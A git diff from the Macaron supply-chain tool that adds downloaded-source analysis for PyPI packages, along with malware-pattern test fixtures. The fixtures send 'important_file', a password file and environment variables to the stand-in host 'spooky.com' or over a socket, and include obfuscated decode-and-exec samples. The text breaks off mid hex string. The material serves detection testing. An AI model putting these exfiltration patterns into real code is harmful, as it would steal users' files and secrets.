""" - # TODO: This redundant function might be removed - sourcecode_analyzer = PyPISourcecodeAnalyzer(pypi_package_json) - is_malware, detail_info = sourcecode_analyzer.analyze() - return is_malware, detail_info + logger.debug("Instantiating %s", PyPISourcecodeAnalyzer.__name__) + analyzer = PyPISourcecodeAnalyzer() + + if analyzer.depends_on and self._should_skip(results, analyzer.depends_on): + return HeuristicResult.SKIP, {} + + try: + with pypi_package_json.sourcecode(): + return analyzer.analyze(pypi_package_json) + except SourceCodeError as error: + error_msg = f"Unable to perform analysis, source code not available: {error}" + logger.debug(error_msg) + raise HeuristicAnalyzerValueError(error_msg) from error def evaluate_heuristic_results( self, heuristic_results: dict[Heuristics, HeuristicResult] @@ -279,6 +297,7 @@ def run_check(self, ctx: AnalyzeContext) -> CheckResultData: has_repository=ctx.component.repository is not None, pypi_registry=pypi_registry, package_json={}, + package_sourcecode_path="", ) pypi_registry_info.metadata.append(pypi_package_json) @@ -286,28 +305,39 @@ def run_check(self, ctx: AnalyzeContext) -> CheckResultData: # Download the PyPI package JSON, but no need to persist it to the filesystem. 
if pypi_package_json.package_json or pypi_package_json.download(dest=""): try: - result, detail_info = self.run_heuristics(pypi_package_json) + heuristic_results, heuristics_detail_info = self.run_heuristics(pypi_package_json) except HeuristicAnalyzerValueError: return CheckResultData(result_tables=[], result_type=CheckResultType.UNKNOWN) - confidence, triggered_rules = self.evaluate_heuristic_results(result) - detail_info["triggered_rules"] = triggered_rules + confidence, triggered_rules = self.evaluate_heuristic_results(heuristic_results) + heuristics_detail_info["triggered_rules"] = triggered_rules result_type = CheckResultType.FAILED if not confidence: confidence = Confidence.HIGH result_type = CheckResultType.PASSED - elif ctx.dynamic_data["validate_malware"]: - is_malware, validation_result = self.validate_malware(pypi_package_json) - if is_malware: # Find source code block matched the malicious pattern - confidence = Confidence.HIGH - elif validation_result: # Find suspicious source code, but cannot be confirmed - confidence = Confidence.MEDIUM - logger.debug(validation_result) + + # experimental sourcecode analysis feature + if ctx.dynamic_data["analyze_source"]: + try: + sourcecode_result, sourcecode_detail_info = self.analyze_source( + pypi_package_json, heuristic_results + ) + except (HeuristicAnalyzerValueError, ConfigurationError): + return CheckResultData(result_tables=[], result_type=CheckResultType.UNKNOWN) + + heuristic_results[Heuristics.SUSPICIOUS_PATTERNS] = sourcecode_result + heuristics_detail_info.update(sourcecode_detail_info) + + if sourcecode_result == HeuristicResult.FAIL: + if result_type == CheckResultType.PASSED: + # heuristics determined it benign, so lower the confidence + confidence = Confidence.LOW + result_type = CheckResultType.FAILED result_tables.append( MaliciousMetadataFacts( - result=result, - detail_information=detail_info, + result=heuristic_results, + detail_information=heuristics_detail_info, confidence=confidence, ) ) 
diff --git a/src/macaron/slsa_analyzer/package_registry/pypi_registry.py b/src/macaron/slsa_analyzer/package_registry/pypi_registry.py index b0b0275b5..2c6af515c 100644 --- a/src/macaron/slsa_analyzer/package_registry/pypi_registry.py +++ b/src/macaron/slsa_analyzer/package_registry/pypi_registry.py @@ -5,10 +5,13 @@ import logging import os +import re +import shutil import tarfile import tempfile import urllib.parse -import zipfile +from collections.abc import Callable, Generator, Iterator +from contextlib import contextmanager from dataclasses import dataclass from datetime import datetime @@ -17,7 +20,7 @@ from requests import RequestException from macaron.config.defaults import defaults -from macaron.errors import ConfigurationError, InvalidHTTPResponseError +from macaron.errors import ConfigurationError, InvalidHTTPResponseError, SourceCodeError from macaron.json_tools import json_extract from macaron.malware_analyzer.datetime_parser import parse_datetime from macaron.slsa_analyzer.package_registry.package_registry import PackageRegistry @@ -26,6 +29,10 @@ logger: logging.Logger = logging.getLogger(__name__) +def _handle_temp_dir_clean(function: Callable, path: str, onerror: tuple) -> None: + raise SourceCodeError(f"Error removing with shutil. function={function}, " f"path={path}, excinfo={onerror}") + + class PyPIRegistry(PackageRegistry): """This class implements the pypi package registry.""" @@ -159,77 +166,102 @@ def download_package_json(self, url: str) -> dict: return res_obj - def fetch_sourcecode(self, src_url: str) -> dict[str, str] | None: - """Get the source code of the package. + def download_package_sourcecode(self, url: str) -> str: + """Download the package source code from pypi registry. + + Parameters + ---------- + url: str + The package source code url. Returns ------- - str | None - The source code. + str + The temp directory with the source code. 
+ + Raises + ------ + InvalidHTTPResponseError + If the HTTP request to the registry fails or an unexpected response is returned. """ # Get name of file. - _, _, file_name = src_url.rpartition("/") - - # Create a temporary directory to store the downloaded source. - with tempfile.TemporaryDirectory() as temp_dir: + _, _, file_name = url.rpartition("/") + package_name = re.sub(r"\.tar\.gz$", "", file_name) + + # temporary directory to unzip and read all source files + temp_dir = tempfile.mkdtemp(prefix=f"{package_name}_") + response = send_get_http_raw(url, stream=True) + if response is None: + error_msg = f"Unable to find package source code using URL: {url}" + logger.debug(error_msg) try: - response = requests.get(src_url, stream=True, timeout=40) - response.raise_for_status() - except requests.exceptions.HTTPError as http_err: - logger.debug("HTTP error occurred: %s", http_err) - return None + shutil.rmtree(temp_dir, onerror=_handle_temp_dir_clean) + except SourceCodeError as tempdir_exception: + tempdir_exception_msg = ( + f"Unable to cleanup temporary directory {temp_dir} for source code: {tempdir_exception}" + ) + logger.debug(tempdir_exception_msg) + raise InvalidHTTPResponseError(error_msg) from tempdir_exception - if response.status_code != 200: - return None + raise InvalidHTTPResponseError(error_msg) - source_file = os.path.join(temp_dir, file_name) - with open(source_file, "wb") as file: - try: - for chunk in response.iter_content(): - file.write(chunk) - except RequestException as error: - # Something went wrong with the request, abort. 
- logger.debug("Error while streaming source file: %s", error) - response.close() - return None - logger.debug("Begin fetching the source code from PyPI") - py_files_content: dict[str, str] = {} - if tarfile.is_tarfile(source_file): + with tempfile.NamedTemporaryFile("+wb", delete=True) as source_file: + try: + for chunk in response.iter_content(): + source_file.write(chunk) + source_file.flush() + except RequestException as stream_error: + error_msg = f"Error while streaming source file: {stream_error}" + logger.debug(error_msg) try: - with tarfile.open(source_file, "r:gz") as tar: - for member in tar.getmembers(): - if member.isfile() and member.name.endswith(".py") and member.size > 0: - file_obj = tar.extractfile(member) - if file_obj: - content = file_obj.read().decode("utf-8") - py_files_content[member.name] = content - except tarfile.ReadError as exception: - logger.debug("Error reading tar file: %s", exception) - return None - elif zipfile.is_zipfile(source_file): + shutil.rmtree(temp_dir, onerror=_handle_temp_dir_clean) + except SourceCodeError as tempdir_exception: + tempdir_exception_msg = ( + f"Unable to cleanup temporary directory {temp_dir} for source code: {tempdir_exception}" + ) + logger.debug(tempdir_exception_msg) + + raise InvalidHTTPResponseError(error_msg) from RequestException + + if tarfile.is_tarfile(source_file.name): try: - with zipfile.ZipFile(source_file, "r") as zip_ref: - for info in zip_ref.infolist(): - if info.filename.endswith(".py") and not info.is_dir() and info.file_size > 0: - with zip_ref.open(info) as file_obj: - content = file_obj.read().decode("utf-8") - py_files_content[info.filename] = content - except zipfile.BadZipFile as bad_zip_exception: - logger.debug("Error reading zip file: %s", bad_zip_exception) - return None - except zipfile.LargeZipFile as large_zip_exception: - logger.debug("Zip file too large to read: %s", large_zip_exception) - return None - # except KeyError as zip_key_exception: - # logger.debug( - # 
"Error finding target '%s' in zip file '%s': %s", archive_target, source_file, zip_key_exception - # ) - # return None + with tarfile.open(source_file.name, "r:gz") as sourcecode_tar: + sourcecode_tar.extractall(temp_dir, filter="data") + + except tarfile.ReadError as read_error: + error_msg = f"Error reading source code tar file: {read_error}" + logger.debug(error_msg) + try: + shutil.rmtree(temp_dir, onerror=_handle_temp_dir_clean) + except SourceCodeError as tempdir_exception: + tempdir_exception_msg = ( + f"Unable to cleanup temporary directory {temp_dir} for source code: {tempdir_exception}" + ) + logger.debug(tempdir_exception_msg) + + raise InvalidHTTPResponseError(error_msg) from read_error + + extracted_dir = os.listdir(temp_dir) + if len(extracted_dir) == 1 and package_name == extracted_dir[0]: + # structure used package name and version as top-level directory + temp_dir = os.path.join(temp_dir, extracted_dir[0]) + else: - logger.debug("Unable to extract file: %s", file_name) + error_msg = f"Unable to extract source code from file {file_name}" + logger.debug(error_msg) + try: + shutil.rmtree(temp_dir, onerror=_handle_temp_dir_clean) + except SourceCodeError as tempdir_exception: + tempdir_exception_msg = ( + f"Unable to cleanup temporary directory {temp_dir} for source code: {tempdir_exception}" + ) + logger.debug(tempdir_exception_msg) + raise InvalidHTTPResponseError(error_msg) from tempdir_exception + + raise InvalidHTTPResponseError(error_msg) - logger.debug("Successfully fetch the source code from PyPI") - return py_files_content + logger.debug("Temporary download and unzip of %s stored in %s", file_name, temp_dir) + return temp_dir def get_package_page(self, package_name: str) -> str | None: """Implement custom API to get package main page. @@ -389,6 +421,9 @@ class PyPIPackageJsonAsset: #: The asset content. package_json: dict + #: the source code temporary location name + package_sourcecode_path: str + #: The size of the asset (in bytes). 
This attribute is added to match the AssetLocator #: protocol and is not used because pypi API registry does not provide it. @property @@ -518,16 +553,120 @@ def get_latest_release_upload_time(self) -> str | None: return upload_time return None - def get_sourcecode(self) -> dict[str, str] | None: - """Get source code of the package. + @contextmanager + def sourcecode(self) -> Generator[None]: + """Download and cleanup source code of the package with a context manager.""" + if not self.download_sourcecode(): + raise SourceCodeError("Unable to download package source code.") + yield + self.cleanup_sourcecode() + + def download_sourcecode(self) -> bool: + """Get the source code of the package and store it in a temporary directory. Returns ------- - dict[str, str] | None - The source code of each script in the package + bool + ``True`` if the source code is downloaded successfully; ``False`` if not. """ - url: str | None = self.get_sourcecode_url() + url = self.get_sourcecode_url() if url: - source_code: dict[str, str] | None = self.pypi_registry.fetch_sourcecode(url) - return source_code - return None + try: + self.package_sourcecode_path = self.pypi_registry.download_package_sourcecode(url) + return True + except InvalidHTTPResponseError as error: + logger.debug(error) + return False + + def cleanup_sourcecode(self) -> None: + """ + Delete the temporary directory created when downloading the source code. + + The package source code is no longer accessible after this, and the package_sourcecode_path + attribute is set to an empty string. 
+ """ + if self.package_sourcecode_path: + try: + shutil.rmtree(self.package_sourcecode_path, onerror=_handle_temp_dir_clean) + self.package_sourcecode_path = "" + except SourceCodeError as tempdir_exception: + tempdir_exception_msg = ( + f"Unable to cleanup temporary directory {self.package_sourcecode_path}" + f" for source code: {tempdir_exception}" + ) + logger.debug(tempdir_exception_msg) + raise tempdir_exception + + def get_sourcecode_file_contents(self, path: str) -> bytes: + """ + Get the contents of a single source code file specified by the path. + + The path can be relative to the package_sourcecode_path attribute, or an absolute path. + + Parameters + ---------- + path: str + The absolute or relative to package_sourcecode_path file path to open. + + Returns + ------- + bytes + The raw contents of the source code file. + + Raises + ------ + SourceCodeError + if the source code has not been downloaded, or there is an error accessing the file. + """ + if not self.package_sourcecode_path: + error_msg = "No source code files have been downloaded" + logger.debug(error_msg) + raise SourceCodeError(error_msg) + + if not os.path.isabs(path): + path = os.path.join(self.package_sourcecode_path, path) + + if not os.path.exists(path): + error_msg = f"Unable to locate file {path}" + logger.debug(error_msg) + raise SourceCodeError(error_msg) + + try: + with open(path, "rb") as file: + return file.read() + except OSError as read_error: + error_msg = f"Unable to read file {path}: {read_error}" + logger.debug(error_msg) + raise SourceCodeError(error_msg) from read_error + + def iter_sourcecode(self) -> Iterator[tuple[str, bytes]]: + """ + Iterate through all source code files. + + Returns + ------- + tuple[str, bytes] + The source code file path, and the raw contents of the source code file. + + Raises + ------ + SourceCodeError + if the source code has not been downloaded.
+ """ + if not self.package_sourcecode_path: + error_msg = "No source code files have been downloaded" + logger.debug(error_msg) + raise SourceCodeError(error_msg) + + for root, _directories, files in os.walk(self.package_sourcecode_path): + for file in files: + if root == ".": + root_path = os.getcwd() + os.linesep + else: + root_path = root + filepath = os.path.join(root_path, file) + + with open(filepath, "rb") as handle: + contents = handle.read() + + yield filepath, contents diff --git a/src/macaron/util.py b/src/macaron/util.py index d037ead10..96af86991 100644 --- a/src/macaron/util.py +++ b/src/macaron/util.py @@ -131,6 +131,7 @@ def send_get_http_raw( timeout: int | None = None, allow_redirects: bool = True, check_response_fails: bool = True, + stream: bool = False, ) -> Response | None: """Send the GET HTTP request with the given url and headers. @@ -148,6 +149,8 @@ def send_get_http_raw( Whether to allow redirects. Default: True. check_response_fails: bool When True, check if the response fails. Otherwise, return the response. + stream: bool + Indicates whether the response should be immediately downloaded (False) or streamed (True). Default: False. 
Returns ------- @@ -164,10 +167,7 @@ def send_get_http_raw( retry_counter = error_retries try: response = requests.get( - url=url, - headers=headers, - timeout=timeout, - allow_redirects=allow_redirects, + url=url, headers=headers, timeout=timeout, allow_redirects=allow_redirects, stream=stream ) except requests.exceptions.RequestException as error: logger.debug(error) diff --git a/tests/malware_analyzer/pypi/resources/sourcecode_samples/exfiltration/expected_results.json b/tests/malware_analyzer/pypi/resources/sourcecode_samples/exfiltration/expected_results.json new file mode 100644 index 000000000..95ceffc0f --- /dev/null +++ b/tests/malware_analyzer/pypi/resources/sourcecode_samples/exfiltration/expected_results.json @@ -0,0 +1,22 @@ +{ + "src.macaron.resources.pypi_malware_rules.exfiltration_remote-exfiltration": { + "message": "Detected exfiltration of sensitive data to a remote endpoint", + "detections": [ + { + "file": "exfiltration/remote_exfiltration.py", + "start": 31, + "end": 31 + }, + { + "file": "exfiltration/remote_exfiltration.py", + "start": 42, + "end": 42 + }, + { + "file": "exfiltration/remote_exfiltration.py", + "start": 50, + "end": 50 + } + ] + } +} diff --git a/tests/malware_analyzer/pypi/resources/sourcecode_samples/exfiltration/remote_exfiltration.py b/tests/malware_analyzer/pypi/resources/sourcecode_samples/exfiltration/remote_exfiltration.py new file mode 100644 index 000000000..e2602ef1f --- /dev/null +++ b/tests/malware_analyzer/pypi/resources/sourcecode_samples/exfiltration/remote_exfiltration.py @@ -0,0 +1,50 @@ +# Copyright (c) 2025 - 2025, Oracle and/or its affiliates. All rights reserved. +# Licensed under the Universal Permissive License v 1.0 as shown at https://oss.oracle.com/licenses/upl/. + +""" +Running this code will not produce any malicious behavior, but code isolation measures are +in place for safety. 
+""" + +import sys + +# ensure no symbols are exported so this code cannot accidentally be used +__all__ = [] +sys.exit() + +def test_function(): + """ + All code to be tested will be defined inside this function, so it is all local to it. This is + to isolate the code to be tested, as it exists to replicate the patterns present in malware + samples. + """ + sys.exit() + + # NOTE: since these are flows, all will go in subfunctions that they are supposed to be in so the detections + # can be sectioned out. + + def os_to_requests(): + import os + + import requests + with os.popen("cat important_file") as pipe: + requests.post("spooky.com", data=pipe.read()) + + def file_exfil_to_urllib3(): + import os as oo + + import urllib3 as uuu + op = oo.O_RDWR + do_it = oo.open + file = do_it("every_password", op) + man = uuu.PoolManager + http = man().request + http('POST', "spooky.com", body=oo.read(file, 2048)) + + def environ_to_socket(): # nosemgrep + import socket as s # nosemsemgrep + from os import environ as environment_vars # nosemgrep + with s.socket(s.AF_INET, s.SOCK_STREAM) as soc: # nosemgrep + soc.connect(('localhost', 0)) # nosemgrep + other = soc # nosemgrep + other.send(environment_vars) # nosemgrep diff --git a/tests/malware_analyzer/pypi/resources/sourcecode_samples/obfuscation/decode_and_execute.py b/tests/malware_analyzer/pypi/resources/sourcecode_samples/obfuscation/decode_and_execute.py new file mode 100644 index 000000000..114072a52 --- /dev/null +++ b/tests/malware_analyzer/pypi/resources/sourcecode_samples/obfuscation/decode_and_execute.py @@ -0,0 +1,67 @@ +# Copyright (c) 2025 - 2025, Oracle and/or its affiliates. All rights reserved. +# Licensed under the Universal Permissive License v 1.0 as shown at https://oss.oracle.com/licenses/upl/. + +""" +Running this code will not produce any malicious behavior, but code isolation measures are +in place for safety.
+""" + +import sys + +# ensure no symbols are exported so this code cannot accidentally be used +__all__ = [] +sys.exit() + +def test_function(): + """ + All code to be tested will be defined inside this function, so it is all local to it. This is + to isolate the code to be tested, as it exists to replicate the patterns present in malware + samples. + """ + sys.exit() + + # NOTE: since these are flows, all will go in subfunctions that they are supposed to be in so the detections + # can be sections out. + + # marshal encryption from pyobfuscate.com/marshal-encrypt, script is just print("Hello world!") + def marshal_flow(): + from marshal import loads + bytecode = loads(b'\xe3\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x00\x00\x00@\x00\x00\x00s\x0c\x00\x00\x00e\x00d\x00\x83\x01\x01\x00d\x01S\x00)\x02z\x0cHello world!N)\x01\xda\x05print\xa9\x00r\x02\x00\x00\x00r\x02\x00\x00\x00\xfa\x08\xda\x08\x01\x00\x00\x00\xf3\x00\x00\x00\x00') + exec(bytecode) + + def marshal_inline_flow(): + exec(__import__('marshal').loads(b'\xe3\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x00\x00\x00@\x00\x00\x00s\x0c\x00\x00\x00e\x00d\x00\x83\x01\x01\x00d\x01S\x00)\x02z\x0cHello world!N)\x01\xda\x05print\xa9\x00r\x02\x00\x00\x00r\x02\x00\x00\x00\xfa\x08\xda\x08\x01\x00\x00\x00\xf3\x00\x00\x00\x00')) + + def bytes_eval_to_soc_bind(): + import socket + with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as soc: + soc.bind(__import__('builtins').eval(b'("127.0.0.1", 0)'.decode())) + + def map_b64_to_request(): + import requests as req + + # decodes to GET + method = __import__('base64').b64decode(b'R0VU') + # just maps to a random fake link https://www.print-hello-world-sample.com/print/hello/world! 
+ link = ''.join(map(chr, [104, 116, 116, 112, 115, 58, 47, 47, 119, 119, 119, 46, 112, 114, 105, 110, 116, 45, 104, 101, 108, 108, 111, 45, 119, 111, 114, 108, 100, 45, 115, 97, 109, 112, 108, 101, 46, 99, 111, 109, 47, 112, 114, 105, 110, 116, 47, 104, 101, 108, 108, 111, 47, 119, 111, 114, 108, 100, 33])) + _ = req.Request(method, link) + + def zlib_ast_subprocess(): + import subprocess + import zlib as zeeee + from ast import literal_eval + + # just decodes to ["echo", "Hello world!"] + subprocess.Popen(literal_eval(zeeee.decompress(b'x\x9c\x8bVOM\xce\xc8W\xd7QP\xf7H\xcd\xc9\xc9W(\xcf/\xcaIQT\x8f\x05\x00]\xa0\x07\x9d').decode())) + + def propagation_to_write(): + import os as e + + # symbol propagations should detect assign of os as e to o and bytes to b and still trigger + o = e + b = bytes + # just decodes to "Hello world!" + contents = b.fromhex("48656C6C6F20776F726C6421") + # just decodes to "some_path" + file = o.open(''.join(chr(c) for c in [115, 111, 109, 101, 95, 112, 97, 116, 104]), o.O_RDWR) + o.pwritev(file, contents, 0) diff --git a/tests/malware_analyzer/pypi/resources/sourcecode_samples/obfuscation/expected_results.json b/tests/malware_analyzer/pypi/resources/sourcecode_samples/obfuscation/expected_results.json new file mode 100644 index 000000000..a905dc12d --- /dev/null +++ b/tests/malware_analyzer/pypi/resources/sourcecode_samples/obfuscation/expected_results.json @@ -0,0 +1,232 @@ +{ + "src.macaron.resources.pypi_malware_rules.obfuscation_decode-and-execute": { + "message": "Detected the flow of a decoded primitive value to a remote endpoint, process, code evaluation, or file write", + "detections": [ + { + "file": "obfuscation/decode_and_execute.py", + "start": 30, + "end": 30 + }, + { + "file": "obfuscation/decode_and_execute.py", + "start": 33, + "end": 33 + }, + { + "file": "obfuscation/decode_and_execute.py", + "start": 38, + "end": 38 + }, + { + "file": "obfuscation/decode_and_execute.py", + "start": 47, + "end": 47 + }, + { + "file": 
"obfuscation/decode_and_execute.py", + "start": 55, + "end": 55 + }, + { + "file": "obfuscation/decode_and_execute.py", + "start": 67, + "end": 67 + } + ] + }, + "src.macaron.resources.pypi_malware_rules.obfuscation_inline-imports": { + "message": "Found an instance of a suspicious API in a hardcoded inline import", + "detections": [ + { + "file": "obfuscation/decode_and_execute.py", + "start": 33, + "end": 33 + }, + { + "file": "obfuscation/decode_and_execute.py", + "start": 38, + "end": 38 + }, + { + "file": "obfuscation/decode_and_execute.py", + "start": 44, + "end": 44 + }, + { + "file": "obfuscation/inline_imports.py", + "start": 23, + "end": 23 + }, + { + "file": "obfuscation/inline_imports.py", + "start": 24, + "end": 24 + }, + { + "file": "obfuscation/inline_imports.py", + "start": 25, + "end": 25 + }, + { + "file": "obfuscation/inline_imports.py", + "start": 26, + "end": 26 + }, + { + "file": "obfuscation/inline_imports.py", + "start": 27, + "end": 27 + }, + { + "file": "obfuscation/inline_imports.py", + "start": 28, + "end": 28 + }, + { + "file": "obfuscation/inline_imports.py", + "start": 29, + "end": 29 + }, + { + "file": "obfuscation/inline_imports.py", + "start": 31, + "end": 31 + }, + { + "file": "obfuscation/inline_imports.py", + "start": 32, + "end": 32 + }, + { + "file": "obfuscation/obfuscation_tools.py", + "start": 69, + "end": 69 + } + ] + }, + "src.macaron.resources.pypi_malware_rules.obfuscation_obfuscation-tools": { + "message": "Found an indicator of the use of a python code obfuscation tool", + "detections": [ + { + "file": "obfuscation/obfuscation_tools.py", + "start": 23, + "end": 23 + }, + { + "file": "obfuscation/obfuscation_tools.py", + "start": 25, + "end": 31 + }, + { + "file": "obfuscation/obfuscation_tools.py", + "start": 26, + "end": 26 + }, + { + "file": "obfuscation/obfuscation_tools.py", + "start": 27, + "end": 27 + }, + { + "file": "obfuscation/obfuscation_tools.py", + "start": 28, + "end": 28 + }, + { + "file": 
"obfuscation/obfuscation_tools.py", + "start": 30, + "end": 31 + }, + { + "file": "obfuscation/obfuscation_tools.py", + "start": 33, + "end": 33 + }, + { + "file": "obfuscation/obfuscation_tools.py", + "start": 37, + "end": 37 + }, + { + "file": "obfuscation/obfuscation_tools.py", + "start": 39, + "end": 45 + }, + { + "file": "obfuscation/obfuscation_tools.py", + "start": 40, + "end": 40 + }, + { + "file": "obfuscation/obfuscation_tools.py", + "start": 41, + "end": 41 + }, + { + "file": "obfuscation/obfuscation_tools.py", + "start": 42, + "end": 42 + }, + { + "file": "obfuscation/obfuscation_tools.py", + "start": 44, + "end": 45 + }, + { + "file": "obfuscation/obfuscation_tools.py", + "start": 47, + "end": 47 + }, + { + "file": "obfuscation/obfuscation_tools.py", + "start": 51, + "end": 51 + }, + { + "file": "obfuscation/obfuscation_tools.py", + "start": 53, + "end": 59 + }, + { + "file": "obfuscation/obfuscation_tools.py", + "start": 54, + "end": 54 + }, + { + "file": "obfuscation/obfuscation_tools.py", + "start": 55, + "end": 55 + }, + { + "file": "obfuscation/obfuscation_tools.py", + "start": 56, + "end": 56 + }, + { + "file": "obfuscation/obfuscation_tools.py", + "start": 58, + "end": 59 + }, + { + "file": "obfuscation/obfuscation_tools.py", + "start": 61, + "end": 61 + }, + { + "file": "obfuscation/obfuscation_tools.py", + "start": 65, + "end": 65 + }, + { + "file": "obfuscation/obfuscation_tools.py", + "start": 68, + "end": 68 + }, + { + "file": "obfuscation/obfuscation_tools.py", + "start": 68, + "end": 68 + } + ] + } +} diff --git a/tests/malware_analyzer/pypi/resources/sourcecode_samples/obfuscation/inline_imports.py b/tests/malware_analyzer/pypi/resources/sourcecode_samples/obfuscation/inline_imports.py new file mode 100644 index 000000000..80e006781 --- /dev/null +++ b/tests/malware_analyzer/pypi/resources/sourcecode_samples/obfuscation/inline_imports.py @@ -0,0 +1,32 @@ +# Copyright (c) 2025 - 2025, Oracle and/or its affiliates. All rights reserved. 
+# Licensed under the Universal Permissive License v 1.0 as shown at https://oss.oracle.com/licenses/upl/. + +""" +Running this code will not produce any malicious behavior, but code isolation measures are +in place for safety. +""" + +import sys + +# ensure no symbols are exported so this code cannot accidentally be used +__all__ = [] +sys.exit() + +def test_function(): + """ + All code to be tested will be defined inside this function, so it is all local to it. This is + to isolate the code to be tested, as it exists to replicate the patterns present in malware + samples. + """ + sys.exit() + + __import__('base64') + __import__('builtins') + __import__('subprocess') + __import__('sys') + __import__('os') + __import__('zlib') + __import__('marshal') + # these both just import builtins + __import__('\142\165\151\154\164\151\156\163') + __import__('\x62\x75\x69\x6c\x74\x69\x6e\x73') diff --git a/tests/malware_analyzer/pypi/resources/sourcecode_samples/obfuscation/obfuscation_tools.py b/tests/malware_analyzer/pypi/resources/sourcecode_samples/obfuscation/obfuscation_tools.py new file mode 100644 index 000000000..270f88600 --- /dev/null +++ b/tests/malware_analyzer/pypi/resources/sourcecode_samples/obfuscation/obfuscation_tools.py @@ -0,0 +1,69 @@ +# Copyright (c) 2025 - 2025, Oracle and/or its affiliates. All rights reserved. +# Licensed under the Universal Permissive License v 1.0 as shown at https://oss.oracle.com/licenses/upl/. + +""" +Running this code will not produce any malicious behavior, but code isolation measures are +in place for safety. +""" + +import sys + +# ensure no symbols are exported so this code cannot accidentally be used +__all__ = [] +sys.exit() + +def test_function(): + """ + All code to be tested will be defined inside this function, so it is all local to it. This is + to isolate the code to be tested, as it exists to replicate the patterns present in malware + samples. 
+ """ + sys.exit() + # using pyobfuscate.com/rename-obf to rename items, code is a class that has one method that prints Hello world! + lllllllllllllll, llllllllllllllI = __name__, print + + class lIIlIIIIIIIlIlllIl: + IIlIllIIlllIlIlIll = 'Hello' + IlIIlIIIlIllIIlIIl = 'world' + IIlIlIlIIIIlIIlIlI = '!' + + def IIlIlIIIIlIlIlIIll(IIIlIlIIllllIlIlll): + llllllllllllllI(f'{IIIlIlIIllllIlIlll.IIlIllIIlllIlIlIll} {IIIlIlIIllllIlIlll.IlIIlIIIlIllIIlIIl}{IIIlIlIIllllIlIlll.IIlIlIlIIIIlIIlIlI}') + if lllllllllllllll == '__main__': + llIlIIIllIIIIlIlll = lIIlIIIIIIIlIlllIl() + llIlIIIllIIIIlIlll.IIlIlIIIIlIlIlIIll() + + # using using pyob.oxyry.com's naming convention + __O0O00O00O0OOOOO0O, __OO00000OOOO000OO0 = __name__, print + + class OO0OO0OOO0OOOO000: + OO000OOOOO00O0OOO = 'Hello' + OOO0O00O00000O0O0 = 'world' + OOOOO0O000O0O000O = '!' + + def OOOOOO000OOO0O0O0(O00O00O0O00O000O0): + __OO00000OOOO000OO0(f'{O00O00O0O00O000O0.OO000OOOOO00O0OOO} {O00O00O0O00O000O0.OOO0O00O00000O0O0}{O00O00O0O00O000O0.OOOOO0O000O0O000O}') + if __O0O00O00O0OOOOO0O == '__main__': + __OO00000O00OOOO0OO = OO0OO0OOO0OOOO000() + __OO00000O00OOOO0OO.OOOOOO000OOO0O0O0() + + # using pyarmor's RTF mode naming convention + pyarmor__12, pyarmor__14 = __name__, print + + class pyarmor__16: + pyarmor__18 = 'Hello' + pyarmor__0 = 'world' + pyarmor__8 = '!' 
+ + def pyarmor__24(pyarmor__60): + pyarmor__14(f'{pyarmor__60.pyarmor__18} {pyarmor__60.pyarmor__0}{pyarmor__60.pyarmor__8}') + if pyarmor__12 == '__main__': + pyarmor__2 = pyarmor__16() + pyarmor__2.pyarmor__24() + + # inline pyarmor marker + # pyarmor: print('this script is obfuscated') + + # obfuscated using pyobfuscate.com/pyd's AES 256-bit encryption + pyobfuscate=(lambda getattr:[((lambda IIlII,IlIIl:setattr(__builtins__,IIlII,IlIIl))(IIlII,IlIIl)) for IIlII,IlIIl in getattr.items()]);Il=chr(114)+chr(101);lI=r'[^a-zA-Z0-9]';lIl=chr(115)+chr(117)+chr(98);lllllllllllllll, llllllllllllllI, lllllllllllllIl,lllllllllIIllIIlI = __import__, getattr, bytes,exec + __import__("sys").setrecursionlimit(100000000);lllllllllIIllIIlI(llllllllllllllI(lllllllllllllll(lllllllllllllIl.fromhex('7a6c6962').decode()), lllllllllllllIl.fromhex('6465636f6d7072657373').decode())(lllllllllllllIl.fromhex('789ced1ded6edb38f2557cbf22b559c1f737455e615f20300437717b069cb8485cec2e0ef7ee2759964491f3c90f597224140b9543cef70c6748b95b96f5f378d8be7e7fd9aeca87d33fbf76d99732ff56aecbc78fd3fbb7f2f23cbeec9f4fd5683775fd50ae8bb27c3ebeeccab2783e96dbf79fcfc7df6fa7f392c73f8f6fbbea6dfd58ae1b1c8f0d9eeca9c29ce5f7d59f167556c1d65983f7a15a5243fa918a52f5f79ada79c500500fe69b8ad9f2f169736195a2033fa648e7a7306617c822674276561db928cbeba752efba67ca62c2e400a67759e960e86d58affeb9eb665a04feb3fbfb1e18ae6c7d6f68a25179cf8b561bcc70d928e3a9056ebe7ae2ef703d652dfccb97f6ed6bb7240f2090197caa191d7006b15671e6ab5b9bb50e79ee25ec10599e354ee07a6af300feaa8e1867fec0271eda974eae40233276c89b5411413015d9388ec9a2e9c32383228566323767d253c1e8cbfd3c522fe5a89660fc772ccb926c991c6db0582eeddde36dfbdaef1f6d40fc381cb72710433be3e7e1f87d7bf870e7b413f6a7dd3bca439c6dd8021ad2fb99231c438b854d3fc364dbeaec690369ccdea9d78f55ddb38675db627a3ebefe3af4bbffd0e4cf87edc7c7d9e67d02fcb13f746ed08efef77ff736de5fc7bfee873c3dfcdc9db6a7d33b659baccab74f04bc99044ec80671e66d9750349874839853236dcbbcd8bc4517364c4c185df20cdd533bd3eb6a8ca924ff44ae5de510a7921bc6ffcbfeddee18cc59565fd2
